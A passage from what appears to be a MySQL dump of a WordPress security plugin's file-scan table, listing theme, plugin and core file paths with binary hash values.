t.�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��#J�D���','H�z���Z�`!U?*�^^�����V�XNN!','',0,'?'),('E�G�Ȳd�5����','wp-content/themes/singularity/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('E�ʞ�2vr8Uv5R�','wp-content/themes/graphene/images/social/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V�0�wջk6�','J��:�L��xY�W�E��<�=����\0\"�{�1�','',0,'?'),('E�أĒ=t\0���Ú','wp-content/themes/Endolf/FT/FT_scope.php',0,'㉃�q�B3v��u.��','㉃�q�B3v��u.��','�h��G+L�&\'AG-G2�n~�H�\rh���','',0,'?'),('E�������g6���','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_diagonals-thick_20_666666_40x40.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�U���4�3�ֵT','u#%��\nÞ��I����	E_��TZ��`H','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E��[�&����\"��','wp-content/themes/brickyard/functions/about/css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��P���܌�E�&��','Sz��Sf����[��E�?Prt���,�@~��7','',0,'?'),('E�Dc�9�>��	��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa 	%�Q�U�SJX;M.G�j','',0,'?'),('E�!u]�N#=S�y(','wp-content/themes/Yegor/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('E���	�N���\"�}','wp-content/themes/hitmag/inc/kirki/assets/js/reset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v]���Q]\r� �g��','v��aAkP��TrBC^z��(piB�i��k:�','',0,'?'),('E��<��I���頺�|','wp-content/themes/gambit/images/default-slider-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`\0Q�W��1Kq\n','�;\Z��1�L����&�L�k�Iss��x/ ','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fw\Z�Wis�~P>��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��/���Hg��','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('F���P�b���d�tH','wp-content/themes/exoplanet/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'{!|�WG��','��C݆��Q�{�\r���ɀ�RO{�5,G�','',0,'?'),('F#!����\Z���>�','wp-content/themes/brickyard/images/pattern-footer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��.ձ<�ß$��\rQ','ϖ�\\��8�����S2e3�p�\"QC�s��c�','',0,'?'),('F`\\��7�����a¯','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ug��Y��x�=|�%{�','a�ed$Y��9XGZ(!��uFC����B���=','',0,'?'),('F#qd9* u�|g�j�','wp-content/themes/saybusiness/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z㲡�LE\0\n�č�','�!�\n����DF���7W5����G�h2d�l;U]','',0,'?'),('F,���l�ߤ��>��','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/fancy-type/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܞ̅�\r,.s��;�','r��T��x\Z]&�\0����W?� 9��\0*','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('F8�Na��[Yc�','wp-content/themes/chronus/assets/css/theme-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��ȮA�b(z�^ ','�9sh4\n���2d��b�����#���O�<','',0,'?'),('F<����̛(a��','wp-content/themes/graduate/assets/js/animation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pq���hgߒ�<�q','X]�9�\Z[䋜�F�(�Uuu��sr%�\0��','',0,'?'),('F=�n�|:�7*�NMp�','wp-content/themes/newsmag/inc/widgets/posts_column/class-widget-newsmag-posts_column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(\r�E�pLG��Đ?','j���d\'߃�~]r���������qw�.t���','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('F`���� �r}ہd�','wp-content/themes/graphene/admin/db-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�whl���Z','N��Ž�q�i�A`�e/�ӌ�M����J��х','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('Fq��#�d���!RGL�','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����DF�H�<�P<E�','��p�?��I�Ü$�d�Б>d���Ί1�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n�	:�›{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F}3�(�̬�OI ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j;�ʻ��#��qb','m7w�W���&em�C������1��a�c	=27','',0,'?'),('F}����ݧ����p�)','wp-content/themes/chronus/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e� 3��_�e,','�y\r�A�XTވG��x�GQ�x�N�7h�k�','',0,'?'),('F~��*��c��?�i)','wp-content/themes/authorize/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&*�Ԛ4�\n\'o���','�b�<�Q�(IA���O\r�N�txq:�]f��%P','',0,'?'),('F�P���|[7]�x�]-','wp-content/themes/education-hub/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Ñ~���z2�','�\ZhA�r�!f�L��)�éV\r�d����ț�H�','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','삺�m��\n\'��P�','^���;(�R�@ݪ:��:_9���*j���','',0,'?'),('F���z7\Z^ME%�','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�2�s7؈_���','{�u���D�v���1t�s������œ)��','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('G\"�<��Hn�I��','wp-content/themes/edge/js/source/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��&��L�5��ju','(h�p_P ����\ZcQC*�=���EO*-','',0,'?'),('G�Xi-S�5��W��','wp-content/themes/catch-responsive/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �?��B����]�m	�','\"L<�25���@�UއZKTmS��Q�%','',0,'?'),('G��2$~B�\Z\n-v�','wp-content/themes/quicksand/js/lightgallery/css/lg-fb-comment-box.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jy5q�D�sKC�T;','%$	��,�2kd@�u�~�p��l^}PO�0\'','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�ÂҶ�A-��>c�`','�E�\n�F	�	���M���%{��a���`,�','',0,'?'),('G!��:�[��H������','wp-content/themes/skt-pathway/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�O\Zs���b�~���','Qġ�c�Ԥ�n�G�1ja.\rO�ޓ�q%-v��','',0,'?'),('G) �w�I�/i��X\"','wp-content/themes/metro-magazine/inc/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k37�ICπ���','4�}tW�ej�[4�@�sG�4r��	^�)e�	M}�','',0,'?'),('G1�ػ�ڀ��cV�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��g�c���e#�QF�','�S��;*R\Z\'z�Q���_]D��g�]���539\'�%','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��s�p���p1��','Uuu�	jK��>}��ʊ$|@.8K3����','',0,'?'),('GC([�ƍ�\n������&','wp-content/themes/exoplanet/functions/css/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[^��Q�Ǫ\r:;�5','��˝?��#�O	��C�M���\\�\n�\0VY','',0,'?'),('GC���x,��[��','wp-content/themes/hitmag/inc/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z��6�\"��','/��F��Z�\n�W�i<\no��>D��]�����','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('Gq�b٫	������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��C��̚{\"Hp�=','��R�����l��	�n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G|)���9�if:��','wp-content/themes/simpleshift/assets/images/preview/184x184-6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��7L��*V��P\\�','��V�p0eәu�g\\�\rvkx]��:�H','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G���R�\"�YM��o�\r','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/keymap/vim.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�bs�������~k�','�8��xA�`,��0�au��;?ORO��j���','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A˼ܗ\ri^o4~�','��Q9sY��&a��*�}J�x�1��u����','',0,'?'),('G��a�P�~a> �','wp-content/themes/the-best/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\' ��N깛���V','�?���ǵ�_-ϟ��b7b�\Z�	�\'�fp>UG\0','',0,'?'),('G�Ѝg� 0�����N','wp-content/themes/simpleshift/assets/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%3���-�d/�f��','ĥѐ�]�\Z\'z| *l-ʭz���<�Y@E�u�','',0,'?'),('G�\0Ai��\nDM�s�','wp-content/themes/wp-simple/assets/js/public.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ռⴍ�f���9�','�oWuCx�#����f\rp��̿g��<~��\"I','',0,'?'),('GΪl���y�d��','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lu�Gn����/;k5,W','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp	�0Ox�1{t<�','',0,'?'),('G����7r:$,�M!','wp-content/themes/Endolf/inc/promoted.php',0,'���:���U','���:���U','�I�Y���-ez�дJFN���SA+��cf�K','',0,'?'),('G�?�yİ���~r&','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���#�Rw�ij\n��','&T�)\'4:���\"v�t*���\n�����J\ZR�','',0,'?'),('G�f]h��;�z�TQ','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/twig/twig.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d�\Z�hW\'(�B','g(MԲt��P�df�:=�k�{��⌻�{Dr��','',0,'?'),('G���w!Fx�r�V�','wp-content/themes/university-hub/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qy�7儇o�bPB�\'=','�r֟=��$%ᖨ�J[rg���٤깲�:�','',0,'?'),('H�\0 �� N�HB]I','wp-content/themes/twentytwentyone/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�8�{N����W�L','�>��Q�#*������^�_(VY&I�@‰H�҇[�','',0,'?'),('HX�Oq��U���x<','wp-content/themes/weblog/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��ʅ�w����(v�X�','\\�~�_�R>4�`	㧿��0,�5�}*3ZU�','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�n���VJ�R�x�5��','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('HI���ࡡii�P\n�\r','wp-content/themes/wp-simple/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�Hz�k:\0����','�e4��{��Y�jQ�nGJ�����$ix)ͦ','',0,'?'),('H@f��Q.��P�Y','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/generic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��c�fU�\nF��o�','ʦ�2����4{�%r���m��s9���','',0,'?'),('H���9aY% ϋZ4b�','wp-content/themes/graduate/assets/plugins/css/unminified/slick.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g+��\r����(u','��Ҏ�4ѽ�I�#����\0�K��;���#g�','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('H-iyv�f5��?�=yB','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/dimension.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�d�8o*2�1�o�D�;','�;�d�A\'	A��@�f�*�P<(�Q�m��y','',0,'?'),('H<�Ȳ!�	��K���8','wp-content/themes/singularity/inc/customizer-library/extensions/style-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')`~6q��X�B t���','Mr\n�+b���DgNg��{��W?����U\'�4','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{&��Þ���>��','�i$�z:1$s+»����̔��\Z��!o��','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�E�{�F�\n���','qC�&�+�N<[�l\\{V�h�R�)��Ž2�','',0,'?'),('HO�����T��3\n�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�1��4�-��\0{�','Zz+�OH�	����=����2����6�','',0,'?'),('H\\�AÜ��De#��|7','wp-content/themes/university-hub/third-party/ticker/jquery.easy-ticker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�L����xB}�4n','˨%\n�T�1ʑ�C��Π����-R��&�','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('He�p��?�뢁\"wG�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jF@(�e�`P�','���w:�� ��0�Fڙ��2���s��','',0,'?'),('Hg�a����;yż�','wp-content/themes/event/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1\nk��d � �(�b�','\0[{���u����W4s\Z�=�y����I�r���','',0,'?'),('Hmϡ\n��\0M�}0\"ؒ�','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�L�AZ;ߪ��u','�� ��w�M���ӳY�\r�%��%�\'�aO�A&�x','',0,'?'),('H�G�LY��,\n�\r��f�','wp-content/themes/enigma/css/default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jI8�Y�@sK���S�','o8��\\I��ܕ��.��2����p�~�����','',0,'?'),('H�F|>�Z�`�U����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/hint/sql-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 ̱��>��','��~�B�\\:e������b+��\"�[3_mK��','',0,'?'),('H��f ��6��38��&','wp-content/themes/enigma/images/about-author.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٍ��BE5��v~Z2�',')�/e�!ݠ7����3�/��h.�(ו*�S�','',0,'?'),('H����V�B�uO','wp-content/themes/hemingway/template-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n΢�(�X����8J��','�c�-{����Z��w����C\r���l�;���','',0,'?'),('H�ংݭ���A��/','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�c���\0�p�s�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('H�C�|�[5�`Z(','wp-content/themes/auberge/assets/css/custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����#�u�B�','�\"�!?gg��oH���lŸ�(��Q}�	�','',0,'?'),('H������f�|�&1','wp-content/themes/graduate/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I/��E~}�E�;�','�XT†�_\'�u�����.��Cz���d�','',0,'?'),('H�ѫ�PG��J.$��','wp-content/themes/hemingway/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z���p�k<���J�','���4Q�Ƌ�H1�&T=~����&E�U�','',0,'?'),('H�)�f�D<�\ZbH���','wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=^%UXAa\Z���)Q�','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('H�͛�&����;�fY7','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�4/[\"\r���R�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Po��3���~��Q','����k��_�?�E�%�Gޓi��BEOyQ��','',0,'?'),('H��E]���\'H�K','wp-content/themes/catch-flames/images/demo/featured2-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȁ�>߯b	�2w^\n','�x�*�2F,��bn�J��[?�����<;h�g','',0,'?'),('HԎ�����v�\r�R�','wp-content/themes/singularity/template-parts/headers/header-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��~���g1�SbC','��X;qq�]=K�c�lG(���՝�f���Y��T','',0,'?'),('H�2��[��e\0�s��','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��4��	L�?��','�I&��\n$��E:��N��r�t�\ZK(o\rͰ}��','',0,'?'),('H�w�0��v1�A��','wp-content/themes/graphene/template-onecolumn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�l��G���p)�R�','�d���&�l�Ԓ�s�E}�@�눙x��-�c^','',0,'?'),('Hލ�ꩺ鶍\0�@��','wp-content/themes/wp-simple/inc/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zq@)�\r_?�=�L\Z�','s��@�؜�#�h�rER0}��	A�1#Z��K�','',0,'?'),('H��!��[?�z>����','wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅�:K���7&Z9Hc','�*�F��:��Å=IH\'x��\\\"��\'��:','',0,'?'),('H����{y.�6i�\0�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԝq>g�N���Wu�','��q�4\'�o���i1\0ܱ.�&��@�@��M	|','',0,'?'),('H�h���m\\{�����','wp-content/themes/Endolf/FT/js/jquery.minicolors.min.js',0,'\n�-�0��IBg���~','\n�-�0��IBg���~','+�K*�>����^�ƕۏ�f�W�F\rq#��x�','',0,'?'),('H�0Zk�z|� �\r�+','wp-includes/pomo/pomo/plural-forms.php',0,'s_7�;�	]�Lvlɟ','s_7�;�	]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('H�n~�c,�A��h�9��','wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E@���eR�E�*','��iym딽��B�`��B��`̕�G����','',0,'?'),('I	���b;tY�߬}	�','wp-content/themes/graphene/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+6����娞W\0�!!','��n���i_�$������A��~opF��M��','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('I\Z�����\"��gfp�','wp-content/themes/graphene/images/headers/nebula.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ᴅ�P~�t�����','���rP����q�����&��M��_�','',0,'?'),('I�\Zmx%�	����','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/yaml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|o�ѥ�.��n�F�(','-�驂�ۈ:}���b��T$�)\Z�j��&�Ł��','',0,'?'),('I#M�ͮ�zY��&{�F','wp-content/themes/weblog/assets/js/acme-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�ו�RӍ�tvBY��','�i�R�qx�h�W#�n����4؅�tQL','',0,'?'),('I/zoeH*�3��9�\n��','wp-content/themes/skt-pathway/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rVEj��oB�','�����nǥr7TXŰ\\s�w�������','',0,'?'),('I0���\\[k��~��ZK','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/theme/kirki-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\\���w)��h�','m�� ��U�W-ar�T���(�Z�bp�/D�O','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I1<\">�w��$B�� \r�','wp-content/themes/quicksand/template-parts/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.R� 